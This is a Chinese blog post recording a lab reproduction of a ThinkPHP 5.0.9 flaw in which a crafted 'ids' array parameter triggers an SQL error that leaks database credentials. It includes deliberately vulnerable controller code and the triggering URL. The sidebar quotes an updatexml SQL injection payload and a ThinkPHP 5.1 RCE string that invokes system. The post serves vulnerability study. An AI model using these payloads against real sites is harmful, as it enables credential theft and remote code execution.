记复现“Thinkphp5.X设计缺陷导致泄漏数据库账户密码”

最新推荐文章于 2024-05-17 03:43:50 发布
最新推荐文章于 2024-05-17 03:43:50 发布
阅读量1.7k 收藏
点赞数
文章标签: 数据库 php mysql thinkphp java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/M110K/article/details/112486879
版权

原文见:Thinkphp5.X设计缺陷导致泄漏数据库账户密码
本文只对复现漏洞所遇到的问题做个记录,方便想要复现漏洞的朋友们。对漏洞的分析,作者已经在原文中详细阐述了,在此不再赘述。

实验环境:

实验过程

  • 修改文件:ThinkPHP_5.0.9applicationdatabase.php

1.png

填写好数据库信息:用户名、密码、端口、数据库名、数据库前缀
  • 新建数据库:结构如下图
    2.png

  • 创建文件:ThinkPHP_5.0.9applicationmodelGather.php

    namespace appmodel;
    use thinkModel;
    use thinkDb;

    class Gather extends Model {

    public function getEModel($tables){
    $rs=Db::query('show columns FROM `'.config('database.prefix').$tables."`");
    $obj=[];
    if($rs){
        foreach($rs as $key => $v){
            $obj[$v['Field']] = $v['Default'];
            if($v['Key']=='PRI')$obj[$v['Field']]=0;
        }
    }
return $obj;
}

    }

  • 修改文件:ThinkPHP_5.0.9applicationindexcontrollerIndex.php

    namespace appindexcontroller;
    use appmodelGather;
    use thinkDb;

    class Index
    {

    public function test()
{
    $ids=input("ids/a");
    $gather=new Gather();
    $gather->update([
        'gather_waf'=>'thinkphp',
    ],['Id'=>['in',$ids]]);
}

    }

  • 访问链接:http://127.0.0.1/ThinkPHP_5.0.9/public/index/index/test?ids[000000']=666'
    3.png

4.png
KEY0NE
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
追洞小组 | ThinkPHP5 SQL注入漏洞&敏感信息泄露
Ms08067安全实验室
03-02 499
文章来源|MS08067 WEB攻防知识星球本文作者:叫我啊(Ms08067实验室追洞小组成员)漏洞复现分析 认准追洞小组一、漏洞介绍ThinkPHP是一个开源的,快速、简单的面向对象的...
ThinkPHP5 SQL注入漏洞 && 敏感信息泄露 漏洞复现
ADummy的博客
02-20 1615
ThinkPHP5 SQL注入漏洞 && 敏感信息泄露 by ADummy 0x00利用路线 ​ url直接注入—>有回显 0x01漏洞介绍 ​ ThinkPHP是在中国使用极为广泛的PHP开发框架。在其版本5.0(<5.1.23)中,开启debug模式,传入的某参数在绑定编译指令的时候又没有安全处理,预编译的时候导致SQL异常报错。然而thinkphp5默认开启debug模式,在漏洞环境下构造错误的SQL语法会泄漏数据库账户密码 0x02漏洞复现 payload: h
niushop靶场漏洞查找-文件上传漏洞等(超详细)_niushop漏洞(1)
最新发布
2401_84973048的博客
05-17 450
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
Thinkphp5.X 设计缺陷导致泄漏数据库账户密码
Fly_鹏程万里
12-11 9259
0x00 框架运行环境 ThinkPHP是一个免费开源的,快速、简单的面向对象的轻量级PHP开发框架,是为了敏捷WEB应用开发和简化企业应用开发而诞生的。ThinkPHP从诞生以来一直秉承简洁实用的设计原则,在保持出色的性能和至简的代码的同时,也注重易用性。 PDO查询能阻止大多数传参攻击,而且框架要求的php版本是5.4;这就防止了php在5.3.6下有个PDO本地查询造成SQL注入的漏洞。...
vulhub thinkPHP5 SQL注入&&敏感信息泄露漏洞复现
weixin_53696027的博客
05-22 721
关于vulhub中thinkPHP SQL注入的漏洞复现及其简单的原理介绍
GhostScript 沙箱绕过(命令执行)漏洞(CVE-2018-16509)
黑白的博客
12-22 1266
声明 好好学习,天天向上 漏洞描述 8 月 21 号,Tavis Ormandy 通过公开邮件列表,再次指出 GhostScript 的安全沙箱可以被绕过,通过构造恶意的图片内容,将可以造成命令执行、文件读取、文件删除等漏洞 GhostScript 被许多图片处理库所使用,如 ImageMagick、Python PIL 等,默认情况下这些库会根据图片的内容将其分发给不同的处理方法,其中就包括 GhostScript。 影响范围 Ghostscript 9.24之前版本 复现过程 这里使用7.0.8版本 使
ThinkPHP5 SQL注入漏洞 && 敏感信息泄露
EC_Carrot的博客
08-17 706
漏洞复现 我们访问http://your-ip/index.php?ids[]=1&ids[]=2即可看到用户都没列举出来了存在该漏洞: 访问http://your-ip/index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1,可以看到爆出了许多信息: 更多的利用方法还是自行寻找来的方便,在该环境中报错信息里面还包含了数据库账户密码: ...
ThinkPHP v5.x命令执行利用工具(可getshell)
11-19
这可能导致数据泄露、系统瘫痪甚至整个网络的破坏。在这种情况下,攻击者可能会利用这个工具来执行以下操作: 1. **数据窃取**:获取数据库中的敏感信息,包括用户密码、个人资料、商业机密等。 2. **服务中断**:...
Thinkphp 5.0.x_5.1.x 变量覆盖 RCE 漏洞分析1
08-03
ThinkPHP 5.0.x 和 5.1.x 版本中存在一个变量覆盖导致的远程代码执行(RCE)漏洞。该漏洞利用者可以通过对特定HTTP请求参数的精心构造,从而实现远程代码执行。 #### 环境准备与复现 为了更好地理解该漏洞,建议...
thinkphp5.X-Batch-getshell-master.rar
03-31
然而,任何框架在设计过程中都可能存在安全漏洞ThinkPHP5.x也不例外。"thinkphp5.X-Batch-getshell-master"这个项目名暗示了该压缩包包含的是针对ThinkPHP5.x框架的批量getshell攻击方法集合,可能包括了不同版本...
thinkphp3 与thinkphp5 日志信息泄露检测脚本.zip
02-20
thinkphp3 与thinkphp5 日志信息泄露检测脚本,亲测有效可用,如有侵权,请联系CSDN管理员删除即可
thinkphp5.0.24.zip
10-26
thinkphp5.0.24版本 直接解压覆盖对应目录即可
ThinkPHP5 SQL注入漏洞&&敏感信息泄露漏洞
weixin_45653478的博客
04-27 763
ThinkPHP是在中国使用极为广泛的PHP开发框架。在其版本5.0(<5.1.23)中,开启debug模式,传入的某参数在绑定编译指令的时候又没有安全处理,预编译的时候导致SQL异常报错。然而thinkphp5默认开启debug模式,在漏洞环境下构造错误的SQL语法会泄漏数据库账户密码
Thinkphp漏洞复现
qq_63980959的博客
05-19 499
其 5.0.23 以前的版本中,获取 method 的方法中没有正确处理方法名,导致攻击者可以调用 Request 类任意方法并构造利用链,从而导致远程代码执行漏洞。在其版本 5 中,由于框架处理控制器名称不正确,如果网站未启用强制路由(这是默认设置),它可以执行任何方法,从而导致 RCE 漏洞。传入的某参数在绑定编译指令的时候又没有安全处理,预编译的时候导致SQL异常报错。
Vulhub漏洞复现ThinkPHP5.X SQL注入漏洞和敏感信息泄露漏洞
来到了学渣的博客
01-21 3337
我是啊锋,一个努力的学渣,作为一个刚进入安全大门的小白,我希望能把自己所学到的东西总结出来,分享到博客上,可以一起进步,一起交流,一起学习。 前文: 名字雷同但差个n的两种类型漏洞环境靶机:vulnhub与vulhub的区别 Vulhub漏洞复现之Dns域传送漏洞 Vulhub漏洞复现之Django (小于2.0.8)任意url跳转漏洞(CVE-2018-14574) 漏洞影响: <5....
渗透测试之路:ThinkPHP漏洞复现
m0_68353775的博客
01-10 2326
其实ThinkPH框架漏洞大多用到的都是设置对于控制器名的一个疏忽问题,不理解的小伙伴可以查来url调用文件的机制来学习一下,其实这些框架漏洞都是基于基础漏洞的一些拓展,至于sql漏洞,了解一下pdo预编译原理即可。不管java或是php在进行数据库查询的时候都应该进行pdo预编译,我们都知道,在jdbc工作的时候分成好多步1.建立连接2.写入sql语句3.预编译sql语句4.设置参数5.执行sql获取结果6.遍历结果(处理结果)7.关闭连接。
thinkphp5 漏洞原理分析合集
m0_46689007的博客
11-30 7164
跟进Request.php中method(),Config::get(‘var_method’)提权var_method中的值,var_method的又为_method,这个_method可控,我们传入’__construct’,到$this->{$this->method}($_POST);因为执行的是get方法,跟进get()方法,此方法为读取配置文件,所以我们构造的参数进入get()中就会控制读取内容,后面返回self::$config[$range][$name[0]][$name[1]]。
thinkphp5.X漏洞利用EXP
Websec
05-17 2122
thinkphp5最出名的就是rce,rce有两个大版本的分别 ThinkPHP 5.0-5.0.24 ThinkPHP 5.1.0-5.1.30 因为漏洞触发点和版本的不同,导致payload分为多种,其中一些payload需要取决于debug选项比如直接访问路由触发的 5.1.x : ?s=index/thinkRequest/input&filter[]=system&data=pwd ?s=index/thinkviewdriverPhp/display&conte
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值